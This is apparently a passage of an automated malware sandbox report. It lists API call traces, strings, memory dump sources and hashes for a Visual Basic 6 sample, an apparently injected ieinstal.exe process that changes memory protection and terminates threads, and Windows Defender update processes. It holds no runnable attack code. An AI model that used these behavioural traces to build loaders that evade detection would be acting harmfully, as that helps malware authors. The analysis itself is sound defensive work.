__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC3B
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC45
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC4D
#598.MSVBVM60(?,?,00000001,00000001,00000001,004028FC,?,?,?,?,00401236), ref: 0040FC52
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FC95
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040FCAC
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040FCC3
__vbaFreeStr.MSVBVM60(0040FCFC,004028FC,?,?,?,?,00401236), ref: 0040FCF6

Strings

viljelsheds, xrefs: 0040FC81

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#539#595#598#696ChkstkList
String ID: viljelsheds
API String ID: 1578966974-3410470491
Opcode ID: 20d01c0965d5e75e78c2d54672b9378b5cfa063fb03f594d04095d68e2de78e4
Instruction ID: 36e7a612cfd887cc65fb554be27d5ee97dfa525c1aae4a42cef3e1471acbc2cd
Opcode Fuzzy Hash: 20d01c0965d5e75e78c2d54672b9378b5cfa063fb03f594d04095d68e2de78e4
Instruction Fuzzy Hash: B521C9B194024CAAEB10EBD1C886FDEBB7CEF04704F54413AF601BB591D7B85549CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAF4, Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FB10
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,00401236), ref: 0040FB3F
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401236), ref: 0040FB54
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401236), ref: 0040FB65
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0040FB70
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0040FB7C
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?), ref: 0040FB91
__vbaFreeStr.MSVBVM60(0040FBBC,?,?,00401236), ref: 0040FBB6

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiFreeUnicode$ChkstkErrorListSystem
String ID:
API String ID: 3908248399-0
Opcode ID: 031402b0d736d70a3259af9cfd78d2098ff9d5f6f5b51d7f74496af319f010ac
Instruction ID: 0b533fddaae80eb38eb42e3e8f470ba4a65a9706751bf999df85393180296bef
Opcode Fuzzy Hash: 031402b0d736d70a3259af9cfd78d2098ff9d5f6f5b51d7f74496af319f010ac
Instruction Fuzzy Hash: 2F11B7B2910209BBDF01EFD1DD46EDEBBBCEF04704F00416AFA00B65A1D779AA148B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD19, Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FD34
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,?,?,00401236), ref: 0040FD59
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 0040FD9D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000130), ref: 0040FDDE
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FDFC
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FE04
__vbaFreeStr.MSVBVM60(0040FE31,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401236), ref: 0040FE2B

Memory Dump Source

Source File: 00000005.00000002.15125554416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.15125531159.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.15125647868.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.15125681349.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
String ID:
API String ID: 1253681662-0
Opcode ID: 116c5e1a985369f3168bfbf4e3c9d3e56cb34c434bf93c8e3cee19f57acabea8
Instruction ID: 66deb990b0f0cc1324bc5d270b1fe90238928332bcf628d1e1d7a91dafec7a58
Opcode Fuzzy Hash: 116c5e1a985369f3168bfbf4e3c9d3e56cb34c434bf93c8e3cee19f57acabea8
Instruction Fuzzy Hash: F131D271D10218AFDB21DFA5C849BDEBBF4BF08705F10803AF501B66A0D7786A49DB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exe PID: 2332 Parent PID: 3516 ieinstal.exeCOMMON

Executed Functions

Function 00A0B35D, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00A0B385
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00A0B3F8

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 9080c3fe47cef8b13d9f416039b0c224b43f07f360300d350de704518b890b64
Instruction ID: 06ae56009fa1d33b332aa201f9e65752d6ef253d398641fe047027e96c53a1ae
Opcode Fuzzy Hash: 9080c3fe47cef8b13d9f416039b0c224b43f07f360300d350de704518b890b64
Instruction Fuzzy Hash: AB01D2B18107018FE3009F35DA8CB99B7B5AF153A1F2582A4E9119E0F6C7B8C880CF22

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B136, Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00A0B1BE

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 3c331309834eabc72e001235dc43acfb641a19fb346c446e2f20fb006b561534
Instruction ID: e8257c21879971b256f936c68fda88cedccd0bd9c848c3d07b211a3ef8e9bdbc
Opcode Fuzzy Hash: 3c331309834eabc72e001235dc43acfb641a19fb346c446e2f20fb006b561534
Instruction Fuzzy Hash: 11214834514349CFCB249F3899D5BEA77B2FF56310FA9859AC8CA8B1A6D33444C5C712

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B41D, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A0B4BD

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: b75cd776e21dd82bb58e15ea3185ea8590fdaf1247cfe12b1d0e852fb45512aa
Instruction ID: cf481deb4f05103067a16256a1bcd855242b61b13510ada74ea7f763d8295780
Opcode Fuzzy Hash: b75cd776e21dd82bb58e15ea3185ea8590fdaf1247cfe12b1d0e852fb45512aa
Instruction Fuzzy Hash: 7E1157B21103056FD7228B68E7DAF9A3B65EF19374F2181A1DC418B2E3C325CC81892A

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B418, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A0B4BD

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e4e20b41b8665cd1604b05ef4d1c45779520d4f4a1333bb9ff3d36d788737227
Instruction ID: 43303f9296546e62824baee4388e1613df387772cd7760274cbc72a13a9a71b0
Opcode Fuzzy Hash: e4e20b41b8665cd1604b05ef4d1c45779520d4f4a1333bb9ff3d36d788737227
Instruction Fuzzy Hash: B21104B21103146FD7229F68DB9AB593B68EF19324F168195ED448B1E3C325D8818A2A

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B3B1, Relevance: 1.5, APIs: 1, Instructions: 38sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00A0B385
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00A0B3F8

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 8c2dcb3c56f9d9c56fb5511663243da72a9b760426293682a03448791c7983b0
Instruction ID: d7bee1fedbda33af3a771ba16e42399c70264efcf560abe3166a875b0a21756e
Opcode Fuzzy Hash: 8c2dcb3c56f9d9c56fb5511663243da72a9b760426293682a03448791c7983b0
Instruction Fuzzy Hash: 640100718157808FE3028F32985E389BBB1FF06368B2141C9D8A05F0BAE3789044CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B467, Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00A0B4BD

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6903cb91fbbff79eb493d8ca9cb145ac8af7aa21596b26c21b9ee5ed2eea1826
Instruction ID: 0d520bdf61116936e00a0f762474130c6855868eee78952de889816483821a2e
Opcode Fuzzy Hash: 6903cb91fbbff79eb493d8ca9cb145ac8af7aa21596b26c21b9ee5ed2eea1826
Instruction Fuzzy Hash: DD0121B25023108FE7128F388A1EB527F60FF06324F1A82C9E9889F1A2D330D442CB06

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B197, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00A0B1BE

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 9df856a62065acbfb8b75cdfc00989afa4d7b159cbfd0d608652f398e70a8d73
Instruction ID: 236134e484639e2d762c88d59f42660ad51edbdbd7705bc441f3d3c367a589d4
Opcode Fuzzy Hash: 9df856a62065acbfb8b75cdfc00989afa4d7b159cbfd0d608652f398e70a8d73
Instruction Fuzzy Hash: B4113634A012458FCB168F34C5A57A97BA2EF46314F5982C9C4854F1BAD7315881CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B358, Relevance: 1.3, APIs: 1, Instructions: 17sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 00A0B385
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00A0B3F8

Memory Dump Source

Source File: 0000000D.00000002.19661330398.0000000000A0B000.00000040.00000001.sdmp, Offset: 00A0B000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: ccb5538f54d3d3c91d751c0a13cc66b2671d6fb1c83a68c293d8934b5728e232
Instruction ID: ee377f785c86e241894d5126a2b1c816df4228b3edc7b336b36e37b1f34561be
Opcode Fuzzy Hash: ccb5538f54d3d3c91d751c0a13cc66b2671d6fb1c83a68c293d8934b5728e232
Instruction Fuzzy Hash: 2BE08C70650346CFE740AF6496CCF5432B2AF09311F6A82A9E2094E4E3CB20CC84CA22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mpam-25cd2963.exe PID: 6192 Parent PID: 3224 mpam-25cd2963.exeCOMMON

Executed Functions

Non-executed Functions

Function 00007FF7202E8ED4, Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7202E8F00
GetCurrentThreadId.KERNEL32 ref: 00007FF7202E8F0E
GetCurrentProcessId.KERNEL32 ref: 00007FF7202E8F1A
QueryPerformanceCounter.KERNEL32 ref: 00007FF7202E8F2A

Memory Dump Source

Source File: 00000025.00000002.18580059722.00007FF7202D1000.00000020.00020000.sdmp, Offset: 00007FF7202D0000, based on PE: true

Associated: 00000025.00000002.18580029135.00007FF7202D0000.00000002.00020000.sdmp Download File
Associated: 00000025.00000002.18580299395.00007FF7202FF000.00000002.00020000.sdmp Download File
Associated: 00000025.00000002.18580408167.00007FF72030E000.00000004.00020000.sdmp Download File
Associated: 00000025.00000002.18580452533.00007FF720311000.00000002.00020000.sdmp Download File
Associated: 00000025.00000002.18591489491.00007FF720D11000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: a76a4e6a1184ea4dfe6ea1a3e747e1188b71706198682c5f8343fb96868442ab
Instruction ID: 837e9a784d9da11bbb60d062509615732c151064f505aeb9ac14c2abbe26dd30
Opcode Fuzzy Hash: a76a4e6a1184ea4dfe6ea1a3e747e1188b71706198682c5f8343fb96868442ab
Instruction Fuzzy Hash: F0117022715F428AEB10DF20EC842A833E4F70CB58F841A39EA5D43B94DF3CE1948760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mpam-77b29277.exe PID: 6444 Parent PID: 3224 mpam-77b29277.exeCOMMON

Executed Functions

Non-executed Functions

Function 00007FF6A36E8ED4, Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6A36E8F00
GetCurrentThreadId.KERNEL32 ref: 00007FF6A36E8F0E
GetCurrentProcessId.KERNEL32 ref: 00007FF6A36E8F1A
QueryPerformanceCounter.KERNEL32 ref: 00007FF6A36E8F2A

Memory Dump Source

Source File: 0000002C.00000002.19664202064.00007FF6A36D1000.00000020.00020000.sdmp, Offset: 00007FF6A36D0000, based on PE: true

Associated: 0000002C.00000002.19664147953.00007FF6A36D0000.00000002.00020000.sdmp Download File
Associated: 0000002C.00000002.19664750666.00007FF6A36FF000.00000002.00020000.sdmp Download File
Associated: 0000002C.00000002.19664992010.00007FF6A370E000.00000004.00020000.sdmp Download File
Associated: 0000002C.00000002.19665113663.00007FF6A3711000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: a76a4e6a1184ea4dfe6ea1a3e747e1188b71706198682c5f8343fb96868442ab
Instruction ID: 6a22fe7f64b4cab318c4cddf4a69dc99adf446f17d26ac7c89c0d88da4c90833
Opcode Fuzzy Hash: a76a4e6a1184ea4dfe6ea1a3e747e1188b71706198682c5f8343fb96868442ab
Instruction Fuzzy Hash: DB115236605F418AEB10CF70E8552A833A4F71EB98F441A35EA5D87B94DF3DE194C344

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MpSigStub.exe PID: 4520 Parent PID: 6444 MpSigStub.exeCOMMON

Executed Functions

Function 00007FF7B57C86BC, Relevance: 62.5, APIs: 4, Strings: 31, Instructions: 1273registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF7B57C892E
RegCloseKey.ADVAPI32 ref: 00007FF7B57C894E
RegCloseKey.ADVAPI32 ref: 00007FF7B57C8C84

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

FreeLibrary.KERNEL32 ref: 00007FF7B57C9BB7

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

Strings

Could not set signature location for product: %ws, xrefs: 00007FF7B57C94B7
LoadLibraryEx(%ws, LOAD_WITH_ALTERED_SEARCH_PATH), xrefs: 00007FF7B57C8DEE
Signature Updates, xrefs: 00007FF7B57C939C
OnboardingState, xrefs: 00007FF7B57C8C5B
212e9c34-cc85-497b-a25d-3896e21b5a77, xrefs: 00007FF7B57C9460
MpOpen, xrefs: 00007FF7B57C8EA0
MpUpdateEngine, xrefs: 00007FF7B57C8EDE
MpConfigGetValue, xrefs: 00007FF7B57C9096
%ws\mpclient.dll, xrefs: 00007FF7B57C8C99
%ws\%ws, xrefs: 00007FF7B57C8AFC, 00007FF7B57C9528
MpConfigClose, xrefs: 00007FF7B57C911D
SenseUpdateProvision.dll, xrefs: 00007FF7B57C8AF5
MpGetEngineVersion, xrefs: 00007FF7B57C8F3D
DisableAntiVirus, xrefs: 00007FF7B57C9731
InstallLocation, xrefs: 00007FF7B57C8897, 00007FF7B57C9267
MpConfigInitialize, xrefs: 00007FF7B57C8FC7
SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status, xrefs: 00007FF7B57C8C38
MpUpdatePlatform, xrefs: 00007FF7B57C8F23
DisableAntiSpyware, xrefs: 00007FF7B57C96B1
456c45f0-fd0d-4560-87f5-cfcc28123a76, xrefs: 00007FF7B57C8BE8
MpConfigOpen, xrefs: 00007FF7B57C9051
MpConfigSetValue, xrefs: 00007FF7B57C90DB
GetFileVersion(%ws), xrefs: 00007FF7B57C959F
ProductGUID, xrefs: 00007FF7B57C9433
SignatureRootLocation, xrefs: 00007FF7B57C9395
UpdateStubTest, xrefs: 00007FF7B57C871C
MpConfigUninitialize, xrefs: 00007FF7B57C900C
MpClose, xrefs: 00007FF7B57C8F82
1.1.18500.10, xrefs: 00007FF7B57C9885, 00007FF7B57C9A54
ProductRootRegKey, xrefs: 00007FF7B57C961F
%ws does not exist: %ws, xrefs: 00007FF7B57C957D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$MessageTrace$FreeLibrary
String ID: %ws does not exist: %ws$%ws\%ws$%ws\mpclient.dll$1.1.18500.10$212e9c34-cc85-497b-a25d-3896e21b5a77$456c45f0-fd0d-4560-87f5-cfcc28123a76$Could not set signature location for product: %ws$DisableAntiSpyware$DisableAntiVirus$GetFileVersion(%ws)$InstallLocation$LoadLibraryEx(%ws, LOAD_WITH_ALTERED_SEARCH_PATH)$MpClose$MpConfigClose$MpConfigGetValue$MpConfigInitialize$MpConfigOpen$MpConfigSetValue$MpConfigUninitialize$MpGetEngineVersion$MpOpen$MpUpdateEngine$MpUpdatePlatform$OnboardingState$ProductGUID$ProductRootRegKey$SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status$SenseUpdateProvision.dll$Signature Updates$SignatureRootLocation$UpdateStubTest
API String ID: 3546665933-3395138074
Opcode ID: f1f080a9f8f720bdbde8569dc8d2db32121070f0384402d4dc2200c130ae6a5a
Instruction ID: 4d4cd31a59fc6724f777f1a06f34bd8fb844914265b4806a21d21988c69f90eb
Opcode Fuzzy Hash: f1f080a9f8f720bdbde8569dc8d2db32121070f0384402d4dc2200c130ae6a5a
Instruction Fuzzy Hash: B0D29E22B08A4294FB90EF29D4402B9A7A4EF6AF94F844131DF0D576AEDF3CE551C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C9CFC, Relevance: 49.5, APIs: 21, Strings: 7, Instructions: 532registrysleeptimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57C9D9E
CloseHandle.KERNEL32 ref: 00007FF7B57C9DFA
CloseHandle.KERNEL32 ref: 00007FF7B57C9E54
RegCloseKey.ADVAPI32 ref: 00007FF7B57C9E62
CreateWaitableTimerW.KERNEL32 ref: 00007FF7B57C9E78
CloseHandle.KERNEL32 ref: 00007FF7B57CA0F8
CloseHandle.KERNEL32 ref: 00007FF7B57CA106
RegCloseKey.ADVAPI32 ref: 00007FF7B57CA114
Sleep.KERNEL32 ref: 00007FF7B57CA23E
CloseHandle.KERNEL32 ref: 00007FF7B57CA303
CloseHandle.KERNEL32 ref: 00007FF7B57CA311
RegCloseKey.ADVAPI32 ref: 00007FF7B57CA31F
CloseHandle.KERNEL32 ref: 00007FF7B57CA3CF
CloseHandle.KERNEL32 ref: 00007FF7B57CA3DD
RegCloseKey.ADVAPI32 ref: 00007FF7B57CA3EB
CloseHandle.KERNEL32 ref: 00007FF7B57CA462
CloseHandle.KERNEL32 ref: 00007FF7B57CA470
RegCloseKey.ADVAPI32 ref: 00007FF7B57CA47E
CloseHandle.KERNEL32 ref: 00007FF7B57CA4B9
CloseHandle.KERNEL32 ref: 00007FF7B57CA4C7
RegCloseKey.ADVAPI32 ref: 00007FF7B57CA4D5

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

Waiting for service '%ws' to start, xrefs: 00007FF7B57CA21C
Old platform directory: %ws, xrefs: 00007FF7B57CA174
Service %ws is running (pid=%lu), xrefs: 00007FF7B57CA2C0
%ws\%ws, xrefs: 00007FF7B57CA07F
Timeout (%lu ms) waiting for service to start, xrefs: 00007FF7B57CA330
New platform directory: %ws, xrefs: 00007FF7B57CA18A
InstallLocation, xrefs: 00007FF7B57C9F92

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle$CreateMessageOpenSleepTimerTraceWaitable
String ID: %ws\%ws$InstallLocation$New platform directory: %ws$Old platform directory: %ws$Service %ws is running (pid=%lu)$Timeout (%lu ms) waiting for service to start$Waiting for service '%ws' to start
API String ID: 357996208-2152986022
Opcode ID: 27f79da4ac02852ab0650ca6ed188408599c232f934eaac227ec6e8045a16562
Instruction ID: cfa7f37221747ab0d9c19685ce0d3ab832c47f8b5b8ec0e83969a520e2a3ca22
Opcode Fuzzy Hash: 27f79da4ac02852ab0650ca6ed188408599c232f934eaac227ec6e8045a16562
Instruction Fuzzy Hash: 6E329021B09A0285FB54BB6D94102B9A3A1AF66F99F840035CF0E57B9FDF3DE446C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DB1C4, Relevance: 25.5, APIs: 10, Strings: 4, Instructions: 1022processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7B57DB205
Process32FirstW.KERNEL32 ref: 00007FF7B57DB553
Process32NextW.KERNEL32 ref: 00007FF7B57DB589
GetLastError.KERNEL32 ref: 00007FF7B57DB593
CloseHandle.KERNEL32 ref: 00007FF7B57DC40F

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Process32FirstW.KERNEL32 ref: 00007FF7B57DB893
GetLastError.KERNEL32 ref: 00007FF7B57DB8A1
Process32NextW.KERNEL32 ref: 00007FF7B57DBA33
GetLastError.KERNEL32 ref: 00007FF7B57DBA3D
FindCloseChangeNotification.KERNELBASE ref: 00007FF7B57DBF22

Strings

Update.ProcessId.Process32FirstW, xrefs: 00007FF7B57DB92F
Update.ProcessId.Process32NextW, xrefs: 00007FF7B57DBB56, 00007FF7B57DC0E4
1.1.18500.10, xrefs: 00007FF7B57DB235, 00007FF7B57DB7B6, 00007FF7B57DB98A, 00007FF7B57DBAAA, 00007FF7B57DBBB1, 00007FF7B57DBC39, 00007FF7B57DBC49, 00007FF7B57DBE4C, 00007FF7B57DC02B, 00007FF7B57DC155, 00007FF7B57DC33D
Update.ProcessId.CreateToolHelp32Snapshot, xrefs: 00007FF7B57DB3CC

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastProcess32$CloseFirstNext$ChangeCreateFindHandleNotificationSnapshotToolhelp32
String ID: 1.1.18500.10$Update.ProcessId.CreateToolHelp32Snapshot$Update.ProcessId.Process32FirstW$Update.ProcessId.Process32NextW
API String ID: 1008258399-2810663842
Opcode ID: 4384d37ab230f2388a427ded52467def9e9e08e85a84355c2735311568e99599
Instruction ID: 72d1d6ccbb15b28c12969679bb1022a5bc079a2abbd239a32162f70f1b3a26e7
Opcode Fuzzy Hash: 4384d37ab230f2388a427ded52467def9e9e08e85a84355c2735311568e99599
Instruction Fuzzy Hash: 6CC2A472B09B8289EB10EF28E4401A9B3A4FB6AB54F844135DB5D477AEDF3CE154CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CFF90, Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 402sleepfileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF7B57D009C
GetLastError.KERNEL32 ref: 00007FF7B57D00D8
CloseHandle.KERNEL32 ref: 00007FF7B57D0116
CloseHandle.KERNEL32 ref: 00007FF7B57D016E
CloseHandle.KERNEL32 ref: 00007FF7B57D019C
Sleep.KERNEL32 ref: 00007FF7B57D0213
SetEndOfFile.KERNEL32 ref: 00007FF7B57D0259
CloseHandle.KERNEL32 ref: 00007FF7B57D034E

Part of subcall function 00007FF7B57CF884: TraceMessage.ADVAPI32 ref: 00007FF7B57CF92E

Part of subcall function 00007FF7B582A7E8: SetFilePointerEx.KERNELBASE(?,?,00000000,00007FF7B57DA28B), ref: 00007FF7B582A7F6

CloseHandle.KERNEL32 ref: 00007FF7B57D03A4

Strings

NoMaxRetries, xrefs: 00007FF7B57D0056
1.1.18500.10, xrefs: 00007FF7B57D055F

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ErrorFileLast$MessagePointerSleepTrace
String ID: 1.1.18500.10$NoMaxRetries
API String ID: 3496391825-4008640391
Opcode ID: ce2a1a6bae7f750a3ba5a8506ad328847964f25a44e3e513dca2aa5f5146e719
Instruction ID: 5b998ccaa4c102173e754f830b634a0493166903aeaa9175c8e44bfee9f2361a
Opcode Fuzzy Hash: ce2a1a6bae7f750a3ba5a8506ad328847964f25a44e3e513dca2aa5f5146e719
Instruction Fuzzy Hash: 0B12C171A0868685EB11AB19E4003B9B7A0FB66F94F801235DB6D476EEEF7DE045C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DD038, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B58289A0: SetLastError.KERNEL32 ref: 00007FF7B58289CA
Part of subcall function 00007FF7B58289A0: GetEnvironmentVariableW.KERNEL32 ref: 00007FF7B58289D9
Part of subcall function 00007FF7B58289A0: GetLastError.KERNEL32 ref: 00007FF7B58289E8

